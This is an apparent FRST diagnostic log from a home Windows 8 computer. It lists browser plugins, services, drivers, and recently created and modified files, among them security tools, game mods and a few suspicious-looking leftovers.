SearchScopes: HKLM-x32 - {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
SearchScopes: HKCU - {31090377-0740-419E-BEFC-A56E50500D5B} URL = 
SearchScopes: HKCU - {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = 
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Toolbar BHO -> {7c8f8fe5-9785-4f74-bcf8-895ef9752d97} -> C:\PROGRA~2\GAMING~2\bar\1.bin\gtbar.dll No File
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Jeremy and Heidi\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

Chrome: 
=======

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 a2AntiMalware; C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe [4816568 2014-10-13] (Emsisoft GmbH)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe [3242000 2014-08-25] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe [289328 2014-08-25] (AVG Technologies CZ, s.r.o.)
R2 GFNEXSrv; C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe [156672 2011-10-13] () [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [89352 2014-09-15] (Hewlett-Packard Company)
R3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [43520 2012-07-25] (Microsoft Corporation)
S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [634368 2012-07-25] (Microsoft Corporation)
S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18432 2012-07-25] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16056 2014-09-15] (Microsoft Corporation)
S3 COMSysApp; %SystemRoot%\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 a2acc; C:\PROGRAM FILES (X86)\EMSISOFT ANTI-MALWARE\a2accx64.sys [71472 2014-05-12] (Emsisoft GmbH)
R1 A2DDA; C:\Program Files (x86)\Emsisoft Anti-Malware\a2ddax64.sys [26176 2013-03-28] (Emsisoft GmbH)
R1 a2injectiondriver; C:\Program Files (x86)\Emsisoft Anti-Malware\a2dix64.sys [45208 2013-09-30] (Emsisoft GmbH)
R1 a2util; C:\Program Files (x86)\Emsisoft Anti-Malware\a2util64.sys [23088 2014-05-12] (Emsisoft GmbH)
R2 APXACC; C:\Windows\system32\DRIVERS\appexDrv.sys [199008 2012-06-23] (AppEx Networks Corporation)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98472 2012-07-17] (Advanced Micro Devices)
S0 Avgboota; C:\Windows\System32\DRIVERS\avgboota.sys [20496 2013-09-04] (AVG Technologies CZ, s.r.o.)
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [152344 2014-06-30] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [244504 2014-07-21] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [235800 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [328984 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgwfpa; C:\Windows\system32\DRIVERS\avgwfpa.sys [270104 2014-06-30] (AVG Technologies CZ, s.r.o.)
R3 cleanhlp; C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys [57024 2013-12-04] (Emsisoft GmbH)
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-10-13] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [64216 2014-05-12] (Malwarebytes Corporation)
R2 PEGAGFN; C:\Program Files (x86)\Toshiba\Password Utility\PEGAGFN.sys [14344 2009-09-11] (PEGATRON)
S3 RTL8192Ce; C:\Windows\system32\DRIVERS\rtwlane.sys [1496720 2012-08-13] (Realtek Semiconductor Corporation                           )
R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [1496720 2012-08-13] (Realtek Semiconductor Corporation                           )
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [28632 2012-07-31] (Windows (R) Win 7 DDK provider)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-14 19:30 - 2014-10-14 19:31 - 00016543 _____ () C:\Users\Jeremy and Heidi\Downloads\FRST.txt
2014-10-14 19:29 - 2014-10-14 19:29 - 02110464 _____ (Farbar) C:\Users\Jeremy and Heidi\Downloads\FRST64.exe
2014-10-14 12:40 - 2014-10-14 12:41 - 00060730 _____ () C:\Users\Jeremy and Heidi\Desktop\Addition.txt
2014-10-14 12:37 - 2014-10-14 19:30 - 00000000 ____D () C:\FRST
2014-10-14 12:37 - 2014-10-14 12:41 - 00083482 _____ () C:\Users\Jeremy and Heidi\Desktop\FRST.txt
2014-10-14 12:30 - 2014-10-14 12:32 - 04161313 _____ () C:\Users\Jeremy and Heidi\Desktop\tdsskiller.zip
2014-10-14 12:27 - 2014-10-14 12:28 - 00380416 _____ () C:\Users\Jeremy and Heidi\Desktop\vu0ul4gn.exe
2014-10-13 10:48 - 2014-10-13 12:43 - 00122584 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-13 10:44 - 2014-10-13 10:44 - 00001156 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-13 10:44 - 2014-10-13 10:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-13 10:44 - 2014-10-13 10:44 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-13 10:44 - 2014-10-13 10:44 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-13 10:44 - 2014-05-12 07:35 - 00091352 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-10-13 10:44 - 2014-05-12 07:35 - 00064216 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-10-13 10:44 - 2014-05-12 07:35 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
2014-10-13 10:29 - 2014-10-13 10:30 - 00023038 _____ () C:\Users\Jeremy and Heidi\Desktop\dds.txt
2014-10-13 10:29 - 2014-10-13 10:30 - 00017955 _____ () C:\Users\Jeremy and Heidi\Desktop\attach.txt
2014-10-13 10:24 - 2014-10-13 10:25 - 00688992 ____R (Swearware) C:\Users\Jeremy and Heidi\Desktop\dds.com
2014-10-11 22:41 - 2014-10-11 22:41 - 00043440 _____ () C:\Users\Jeremy and Heidi\Desktop\Result.txt
2014-10-11 22:37 - 2014-10-11 22:37 - 00401920 _____ (Farbar) C:\Users\Jeremy and Heidi\Desktop\MiniToolBox.exe
2014-10-11 22:18 - 2014-10-11 22:18 - 00281280 _____ () C:\windows\Minidump\101114-49483-01.dmp
2014-10-10 08:22 - 2014-10-10 08:22 - 00000000 ____D () C:\Program Files (x86)\GPLGS
2014-10-10 08:21 - 2014-10-10 08:21 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CutePDF
2014-10-10 08:21 - 2014-10-10 08:21 - 00000000 ____D () C:\ProgramData\APN
2014-10-10 08:21 - 2014-10-10 08:21 - 00000000 ____D () C:\Program Files (x86)\Acro Software
2014-10-10 08:21 - 2014-03-05 16:31 - 00489392 _____ (Ask Partner Network) C:\Users\Jeremy and Heidi\Documents\APNSetup1.exe
2014-10-10 08:21 - 2013-10-23 14:24 - 00087600 _____ () C:\windows\system32\cpwmon64.dll
2014-10-10 08:19 - 2014-10-10 08:19 - 05254656 _____ () C:\Users\Jeremy and Heidi\Downloads\converter.exe
2014-10-10 08:19 - 2014-10-10 08:19 - 02003352 _____ (Acro Software Inc. ) C:\Users\Jeremy and Heidi\Downloads\CuteWriter.exe
2014-10-09 09:55 - 2014-10-09 09:56 - 118744568 _____ () C:\Users\Jeremy and Heidi\Downloads\OJ6600_1315-1.exe
2014-10-09 09:55 - 2014-10-09 09:55 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\Hewlett-Packard
2014-10-09 09:55 - 2014-10-09 09:55 - 00000000 ____D () C:\Program Files (x86)\Hewlett-Packard
2014-10-09 09:52 - 2014-10-09 09:53 - 05152768 _____ () C:\Users\Jeremy and Heidi\Downloads\HPSupportSolutionsFramework-11.51.0027.msi
2014-10-07 08:10 - 2014-10-07 08:10 - 00417918 _____ () C:\Users\Jeremy and Heidi\Downloads\Better-Dungeons-Mod-1.7.10.zip
2014-10-03 18:43 - 2014-10-03 18:43 - 00178800 _____ (Sony DADC Austria AG.) C:\windows\SysWOW64\CmdLineExt_x64.dll
2014-10-02 19:14 - 2014-10-02 19:14 - 00000000 ____D () C:\ProgramData\Emsisoft
2014-10-02 12:16 - 2014-10-14 19:17 - 00000000 ____D () C:\Program Files (x86)\Emsisoft Anti-Malware
2014-10-02 12:16 - 2014-10-02 12:16 - 00001145 _____ () C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
2014-10-02 12:16 - 2014-10-02 12:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware
2014-10-02 12:11 - 2014-10-02 12:15 - 233663808 _____ (Emsisoft GmbH ) C:\Users\Jeremy and Heidi\Desktop\EmsisoftAntiMalwareSetup.exe
2014-09-30 23:15 - 2014-09-30 23:15 - 03482288 _____ (tuneuppro.com ) C:\Users\Jeremy and Heidi\Downloads\tuppsetup_9809.exe
2014-09-30 22:17 - 2014-09-30 22:17 - 00000000 ____D () C:\windows\AppReadiness
2014-09-30 22:13 - 2014-09-30 22:13 - 00423962 _____ () C:\Users\Jeremy and Heidi\Downloads\AppsDiagnostic.diagcab
2014-09-30 17:25 - 2014-09-30 17:25 - 00000836 _____ () C:\Users\Jeremy and Heidi\Downloads\Enable_PC_settings_and_Control_Panel.reg
2014-09-28 12:52 - 2014-09-28 12:52 - 03021993 _____ () C:\Users\Jeremy and Heidi\Downloads\forge-1.7.10-10.13.0.1208-installer.jar
2014-09-28 12:39 - 2014-10-13 14:57 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\.minecraft
2014-09-27 22:59 - 2014-09-27 23:00 - 00000000 ____D () C:\Users\Jeremy and Heidi\Desktop\minecraft
2014-09-27 21:43 - 2014-09-28 12:28 - 00000000 ____D () C:\Users\Jeremy and Heidi\Desktop\.minecraft.old
2014-09-27 21:42 - 2014-09-27 21:42 - 00000000 ____D () C:\Users\Jeremy and Heidi\Desktop\Aether Mod
2014-09-27 21:33 - 2014-09-27 21:33 - 01063160 _____ (Bleeping Computer, LLC) C:\Users\Jeremy and Heidi\Downloads\rkill64.exe
2014-09-27 21:32 - 2014-09-27 21:32 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Jeremy and Heidi\Downloads\rkill.exe
2014-09-27 20:58 - 2014-09-27 20:58 - 206328880 _____ () C:\Users\Jeremy and Heidi\Desktop\Aether Mod.jar
2014-09-24 20:23 - 2014-09-24 20:23 - 00281224 _____ () C:\windows\Minidump\092414-77033-01.dmp
2014-09-22 20:50 - 2014-08-09 01:30 - 00148480 _____ (Microsoft Corporation) C:\windows\system32\poqexec.exe
2014-09-22 20:50 - 2014-08-09 01:29 - 00144896 _____ (Microsoft Corporation) C:\windows\system32\tssdisai.dll
2014-09-19 20:25 - 2014-10-13 14:57 - 00000648 _____ () C:\Users\Jeremy and Heidi\Downloads\server.properties
2014-09-19 20:25 - 2014-10-13 14:57 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\ops.json
2014-09-19 20:25 - 2014-10-13 14:57 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\banned-players.json
2014-09-19 20:25 - 2014-10-13 14:57 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\banned-ips.json
2014-09-17 21:52 - 2014-09-17 21:52 - 02346942 _____ () C:\Users\Jeremy and Heidi\Desktop\TechnicLauncher(2).exe
2014-09-17 20:55 - 2014-09-17 20:55 - 00000805 _____ () C:\Users\Jeremy and Heidi\Desktop\Minecraft(13).exe - Shortcut.lnk
2014-09-17 20:37 - 2014-10-01 08:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-09-17 20:37 - 2014-09-17 20:36 - 00319912 _____ (Oracle Corporation) C:\windows\system32\javaws.exe
2014-09-17 20:37 - 2014-09-17 20:36 - 00189352 _____ (Oracle Corporation) C:\windows\system32\javaw.exe
2014-09-17 20:37 - 2014-09-17 20:36 - 00189352 _____ (Oracle Corporation) C:\windows\system32\java.exe
2014-09-17 20:37 - 2014-09-17 20:36 - 00111016 _____ (Oracle Corporation) C:\windows\system32\WindowsAccessBridge-64.dll
2014-09-17 20:36 - 2014-09-17 20:36 - 31013800 _____ (Oracle Corporation) C:\Users\Jeremy and Heidi\Downloads\jre-7u67-windows-x64.exe
2014-09-17 20:36 - 2014-09-17 20:36 - 00000000 ____D () C:\Program Files\Java
2014-09-17 19:30 - 2014-09-17 19:33 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\.technic
2014-09-15 20:01 - 2014-10-10 09:04 - 00359864 _____ () C:\windows\system32\FNTCACHE.DAT
2014-09-15 19:34 - 2014-09-15 19:34 - 00000622 _____ () C:\Users\Jeremy and Heidi\Downloads\TakeOwnership.zip
2014-09-15 17:17 - 2014-10-13 12:41 - 00000000 ____D () C:\windows\ERUNT
2014-09-15 17:16 - 2014-09-15 17:16 - 01016261 _____ (Thisisu) C:\Users\Jeremy and Heidi\Downloads\JRT.exe
2014-09-15 16:24 - 2014-09-02 12:32 - 00705480 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerApp.exe
2014-09-15 16:24 - 2014-09-02 12:32 - 00104904 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-09-15 15:06 - 2014-09-15 15:13 - 03778560 _____ () C:\Users\Jeremy and Heidi\Downloads\RogueKillerX64.exe
2014-09-15 11:48 - 2014-07-15 15:51 - 00071168 _____ (Microsoft Corporation) C:\windows\system32\Drivers\hdaudbus.sys
2014-09-15 10:22 - 2014-08-16 02:34 - 02239488 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-09-15 10:22 - 2014-08-16 02:34 - 01407488 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-09-15 10:22 - 2014-08-16 02:34 - 00915968 _____ (Microsoft Corporation) C:\windows\system32\uxtheme.dll
2014-09-15 10:22 - 2014-08-16 02:34 - 00051712 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-09-15 10:22 - 2014-08-16 02:33 - 00603136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-09-15 10:22 - 2014-08-16 02:33 - 00097280 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 15399424 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 03959296 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 02655232 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 01508864 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-09-15 10:22 - 2014-08-16 02:32 - 00855552 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 00451584 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 00281600 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 00255488 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-09-15 10:22 - 2014-08-16 00:37 - 01766400 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll
2014-09-15 10:22 - 2014-08-16 00:37 - 01180672 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 13757440 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 02861568 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 02055168 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 00690688 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 00493056 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 00357888 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 00080384 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll
2014-09-15 10:22 - 2014-08-16 00:35 - 01440768 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl
2014-09-15 10:22 - 2014-03-06 17:47 - 00163840 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll
2014-09-15 10:22 - 2013-05-15 15:37 - 00044032 _____ (Microsoft Corporation) C:\windows\SysWOW64\UXInit.dll
2014-09-15 10:22 - 2013-05-15 15:35 - 00053760 _____ (Microsoft Corporation) C:\windows\system32\UXInit.dll
2014-09-15 10:22 - 2013-05-14 06:14 - 02706432 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-09-15 10:22 - 2013-05-14 02:23 - 02706432 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb
2014-09-15 10:22 - 2013-02-21 03:29 - 00109056 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesysprep.dll
2014-09-15 10:22 - 2013-02-21 03:29 - 00061440 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll
2014-09-15 10:22 - 2013-02-21 03:29 - 00039424 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll
2014-09-15 10:22 - 2013-02-21 03:29 - 00033280 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll
2014-09-15 10:22 - 2013-02-21 03:14 - 00136704 _____ (Microsoft Corporation) C:\windows\system32\iesysprep.dll
2014-09-15 10:22 - 2013-02-21 03:14 - 00053248 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-09-15 10:22 - 2013-02-19 02:53 - 00534528 _____ (Microsoft Corporation) C:\windows\SysWOW64\uxtheme.dll
2014-09-15 10:21 - 2014-08-16 02:33 - 19280384 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-09-15 10:21 - 2014-08-16 00:36 - 14369280 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll
2014-09-15 09:30 - 2014-06-10 15:44 - 00035480 _____ (Microsoft Corporation) C:\windows\system32\TsWpfWrp.exe
2014-09-15 09:30 - 2014-06-10 15:43 - 00035480 _____ (Microsoft Corporation) C:\windows\SysWOW64\TsWpfWrp.exe
2014-09-15 03:27 - 2014-09-15 03:27 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-14 04:28 - 2014-09-14 08:30 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\Ucygemx

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-14 19:00 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\system32\sru
2014-10-14 18:57 - 2012-12-18 23:25 - 01169698 _____ () C:\windows\WindowsUpdate.log
2014-10-14 18:43 - 2012-12-21 22:45 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-14 16:49 - 2014-08-14 16:49 - 00000388 _____ () C:\windows\Tasks\SlimCleaner Plus (Scheduled Scan - Jeremy and Heidi).job
2014-10-14 12:28 - 2012-12-23 18:00 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\CrashDumps
2014-10-14 12:22 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\AUInstallAgent
2014-10-13 14:57 - 2014-08-23 21:16 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\usercache.json
2014-10-13 14:57 - 2014-08-23 21:16 - 00000000 ____D () C:\Users\Jeremy and Heidi\Downloads\world
2014-10-13 13:28 - 2012-07-26 00:59 - 00000000 ____D () C:\windows\CbsTemp
2014-10-13 12:42 - 2012-08-18 04:10 - 01110240 _____ () C:\windows\PFRO.log
2014-10-13 12:42 - 2012-07-26 00:22 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-10-13 10:41 - 2013-03-08 17:40 - 00098304 ___SH () C:\Users\Jeremy and Heidi\Desktop\Thumbs.db
2014-10-11 22:18 - 2012-12-23 23:14 - 00000000 ____D () C:\windows\Minidump
2014-10-11 22:18 - 2012-12-23 23:12 - 595965047 _____ () C:\windows\MEMORY.DMP
2014-10-11 21:52 - 2012-07-25 22:26 - 00262144 ___SH () C:\windows\system32\config\ELAM
2014-10-10 13:12 - 2012-08-18 04:21 - 00000000 ____D () C:\Program Files (x86)\Origin
2014-10-10 13:05 - 2012-07-26 00:28 - 00848230 _____ () C:\windows\system32\PerfStringBackup.INI
2014-10-10 10:18 - 2012-07-25 22:26 - 00524288 ___SH () C:\windows\system32\config\BBI
2014-10-10 10:15 - 2014-02-25 19:59 - 00007592 _____ () C:\Users\Jeremy and Heidi\AppData\Local\Resmon.ResmonCfg
2014-10-10 07:56 - 2012-12-23 08:59 - 00000060 _____ () C:\windows\wpd99.drv
2014-10-10 07:56 - 2012-12-23 08:59 - 00000000 ____D () C:\ProgramData\pdf995
2014-10-09 17:47 - 2014-08-28 13:01 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-10-09 09:55 - 2013-04-19 21:43 - 00000000 ____D () C:\Program Files (x86)\HP
2014-10-08 15:09 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\WinStore
2014-10-06 19:33 - 2012-07-26 00:21 - 00054557 _____ () C:\windows\setupact.log
2014-10-06 15:33 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\system32\SecureBootUpdates
2014-10-04 23:37 - 2012-12-21 19:38 - 00003600 _____ () C:\windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3754358886-4043612072-4009104627-1001
2014-10-03 18:44 - 2014-09-07 18:59 - 00001392 _____ () C:\Users\Public\Desktop\The Sims 4.lnk
2014-10-03 18:42 - 2012-08-18 04:22 - 00000000 ____D () C:\ProgramData\Origin
2014-10-02 19:57 - 2014-05-05 10:20 - 00000000 ____D () C:\Program Files (x86)\OpenDownloaderManager
2014-10-01 08:48 - 2014-08-28 13:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2014-10-01 08:48 - 2014-08-03 17:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bandicut
2014-10-01 08:48 - 2014-08-03 10:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nikon Message Center 2
2014-10-01 08:48 - 2014-08-03 10:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ViewNX 2
2014-10-01 08:48 - 2014-07-30 20:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bandicam
2014-10-01 08:48 - 2014-06-17 08:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-01 08:48 - 2014-06-04 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-01 08:48 - 2014-06-04 09:11 - 00000000 ____D () C:\Program Files\WinRAR
2014-10-01 08:48 - 2014-06-04 09:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2014-10-01 08:48 - 2014-06-04 09:01 - 00000000 ____D () C:\Program Files\WinZip
2014-10-01 08:48 - 2014-05-26 12:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-10-01 08:48 - 2014-03-15 13:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
2014-10-01 08:48 - 2013-07-21 12:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KingsIsle Entertainment
2014-10-01 08:48 - 2013-06-07 23:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-10-01 08:48 - 2013-04-19 21:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2014-10-01 08:48 - 2013-03-20 22:33 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVS4YOU
2014-10-01 08:48 - 2013-01-12 17:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2014-10-01 08:48 - 2012-12-23 08:59 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Software995
